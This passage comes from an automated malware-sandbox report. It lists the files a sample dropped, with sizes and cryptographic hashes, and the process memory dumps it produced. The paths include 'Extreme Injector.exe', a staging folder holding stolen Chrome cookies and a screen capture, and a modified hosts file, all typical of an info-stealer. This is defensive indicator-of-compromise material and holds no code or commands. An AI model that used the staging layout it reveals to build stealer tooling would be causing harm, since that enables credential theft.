60c30527b74659ecf09089a5a7c02a1df9a71b65

SHA256
4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

SHA512
ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
89120ea4747ba6fc68a0c0d44c3df215

SHA1
416739c5e72f6646f73316264eba31910298f655

SHA256
fe523eb0044362a2966fc7caa85b15a8cac429b79e6e94a32e10909ccef6969f

SHA512
3b5b1f55357250b0ff7eace7de07dd8eabd1535ded9ff88e77448737e025ec3c5f57a9e4b7b1fba1c3d0acfa1fccb224709ce1438ef8385a6c368de69b539924

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
7540402e9402ea8a08ed118ec2885e52

SHA1
8cb066baca397b46cbffc60cd4039bd2ae934360

SHA256
88c321cb4afb7280fabe7051c9b8531141b9b2b560ee43cacf50916343fa561e

SHA512
cb33e57416026f4a3a969b9da77177662f6fced2f0217e32d34afc0352c7aab36cfc76d7b7834531b4ac2d2bdb28a57b543f93c171891ecb387d3c349f2dbe78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
107102102e02e48f37f5318c7e113c43

SHA1
7fb10fc65c85fb4c050309f0872bc9389dcccc0d

SHA256
3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

SHA512
b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
cdc867af0945a4f010cb67ff20809e44

SHA1
dec625ce267964a3b86b54c2781acc363321127f

SHA256
14549e648036d46644188efc27c245f0dc1d5fe14f7fbc58865f8b5b7618d332

SHA512
22178a3a602fd59bc8efe78c7085389ffee80a29c8d624a5786acb12061f8bbc699217ff2fc1298f968630ea851c41384233710cac38f5ae31ef79965d87bc38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e136966aba3500e5d57bcfc57edb3be1

SHA1
3dc5f1c1888b68da52706fb5fb053a86d5ac4c8d

SHA256
55f1c311ffec50f6d364764298fcb3172f034ad47b32eea2941bdaab95e369b0

SHA512
118f09f6b0a690641abbae52d5e4fa71493553eadcaee9639e59d671ce64576709b3ec3d94e9cfd066f94774590f76de0796d503c73e432f0f3412f5a97aed81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1927062659a9e61ab42aae0f33ddee39

SHA1
940cee2cc1cdc3320eb5abbbfa8120a7c90331cc

SHA256
91743380c396db06b3a82ec0031e8245e75af2babb2740a0a0699de538be4a98

SHA512
c82745603ddd11046b8309c9cb287ae7eee84ef24404941f16b2dd38324e2204853ea8d4a3fcb44641243a41b7a8b01e70f5a99143606101a59d863b9ed6b9aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a67eee085e8f68aaffbfdb51503d6561

SHA1
29db9b41945c6a5d27d5836a1c780668eded65a0

SHA256
6e155bcc98f4e175a8701f030b73b14d9002b175ef58a19cb9010af3964e36b4

SHA512
7923bc74260e77d62b20cf510b79e0422563469ec3543084a989db154b1e39370f1a6e6c6e73caa7471d0974a693b1beb4fd2ddfb14b0b5c58650b5df3c32d81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
0b2c46afb64240c245eb9c7405296525

SHA1
6ffd95edc4b4f7c6e6ff184ba96f7686c42b414f

SHA256
1cafc74eef2101bfe41fe6d8c82f68b704b034e564a247967445d9638a0583df

SHA512
76ad72317810e6c4311805c9450b45d4fd8553fd842c98c5a9b37783fc46d8a4579ebde9bd713bfdedef3083b64cde4a5adafb5eeccb3a1c57847977c4ad6fa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7yifId7Gx39D1wz

Filesize
20KB

MD5
1fe6fd7143d30069022144d6f865d618

SHA1
44fd5a4c66e0ac0475278c31230e67ff1c98abc6

SHA256
9154293dd543c1f78bd54ae4c4822299273354a9a8e932e44f2a1bff7e3ad033

SHA512
53e6952f4b680486cb07f9bc691cceaa157c28b38af62e213392aabe1a3c933b54faa41f4bd53e081c6b8a829ff9743b562e9d08426048d42d28ee9ba3cb70ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\7yifId7Gx39D1wz

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe

Filesize
231KB

MD5
7d4400842d0ded3544bc7892c765816d

SHA1
c5a12688240f8db93e7482d16d145802445bfd71

SHA256
8b30696e9259851325272d57b9452ac2f6037231f1c6895658efb57e0445d064

SHA512
c6ba7dca5825784b680550d2cbc6528bcb0a5c1b6fbf2a65b2c54112a3c39858e01abb58915ff89c9c0011aa4200257659d516de6abd1f1d71e2eca0cadb065a

Download Submit
C:\Users\Admin\AppData\Local\Temp\HZESWWPj5W5Vh9U

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\T7oUexVlKu47Xxn\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
b752ed0eb4d4d466768974f286e931c2

SHA1
2034b213727576645d3850b8bb0aa20cbec1be59

SHA256
3336d73a71be0716b8205008a20dc6581a14c1ee79b580d2746f689e7b28f127

SHA512
0145b8863fa0680f23f2f0164c73a21e127ee11f03a6886ebacc072144f263c9b1accc7c8393116eb4971e068efa76dec47cf2fa2b361a579a2f177af114d9df

Download Submit
C:\Users\Admin\AppData\Local\Temp\T7oUexVlKu47Xxn\Display\Display.png

Filesize
423KB

MD5
2e4ffc59ff39b8c2233252858de2e329

SHA1
b943c4c1df78784ac9f387de0422869af3b2fb80

SHA256
89bc1afc7a1eca0e25c1f26296bfb098c4969b4c8576b800b9055a9c800ee019

SHA512
62ccb250fd4e56fefd1e3a76e2ebd82560dfcd8a2e230f527db23d28dfdcc410a092ffe5eb1e54ce02c1be48e73f25c5a1cec8125e2d641481b5de1e97f82cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55hyn4n2.qa0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vs33IXEi7cJ0hoI

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/900-741-0x0000021F3E800000-0x0000021F3EA1C000-memory.dmp

Filesize
2.1MB

Download
memory/964-50-0x000001CFE8380000-0x000001CFE83D0000-memory.dmp

Filesize
320KB

Download
memory/964-18-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

Filesize
10.8MB

Download
memory/964-17-0x000001CFCDBB0000-0x000001CFCDBF0000-memory.dmp

Filesize
256KB

Download
memory/964-49-0x000001CFE8300000-0x000001CFE8376000-memory.dmp

Filesize
472KB

Download
memory/964-88-0x000001CFE82A0000-0x000001CFE82AA000-memory.dmp

Filesize
40KB

Download
memory/964-111-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

Filesize
10.8MB

Download
memory/964-51-0x000001CFE8280000-0x000001CFE829E000-memory.dmp

Filesize
120KB

Download
memory/964-89-0x000001CFE82D0000-0x000001CFE82E2000-memory.dmp

Filesize
72KB

Download
memory/1600-1548-0x000001B151570000-0x000001B151719000-memory.dmp

Filesize
1.7MB

Download
memory/2280-1271-0x0000020E58C70000-0x0000020E58E8C000-memory.dmp

Filesize
2.1MB

Download
memory/2464-5-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

Filesize
10.8MB

Download
memory/2464-1-0x00000000002C0000-0x000000000042C000-memory.dmp

Filesize
1.4MB

Download
memory/2464-16-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

Filesize
10.8MB

Download
memory/2464-0-0x00007FFCD4323000-0x00007FFCD4325000-memory.dmp

Filesize
8KB

Download
memory/2688-1474-0x000001B27C230000-0x000001B27C3D9000-memory.dmp

Filesize
1.7MB

Download
memory/2928-1395-0x000001F3E6E20000-0x000001F3E703C000-memory.dmp

Filesize
2.1MB

Download
memory/3532-1379-0x000001246CF10000-0x000001246D12C000-memory.dmp

Filesize
2.1MB

Download
memory/3776-746-0x0000019EAB0B0000-0x0000019EAB259000-memory.dmp

Filesize
1.7MB

Download
memory/4092-44-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4092-12-0x00007FFCD4320000-0x00007FFCD4DE1000-memory.dmp

Filesize
10.8MB

Download
memory/4744-1444-0x0000019728620000-0x000001972883C000-memory.dmp

Filesize
2.1MB

Download
memory/5040-1147-0x000001C7D1F60000-0x000001C7D217C000-memory.dmp

Filesize
2.1MB

Download
memory/5088-1177-0x0000023F55370000-0x0000023F55519000-memory.dmp

Filesize
1.7MB

Download
memory/5112-19-0x000001C97ABC0000-0x000001C97ABE2000-memory.dmp

Filesize
136KB

Download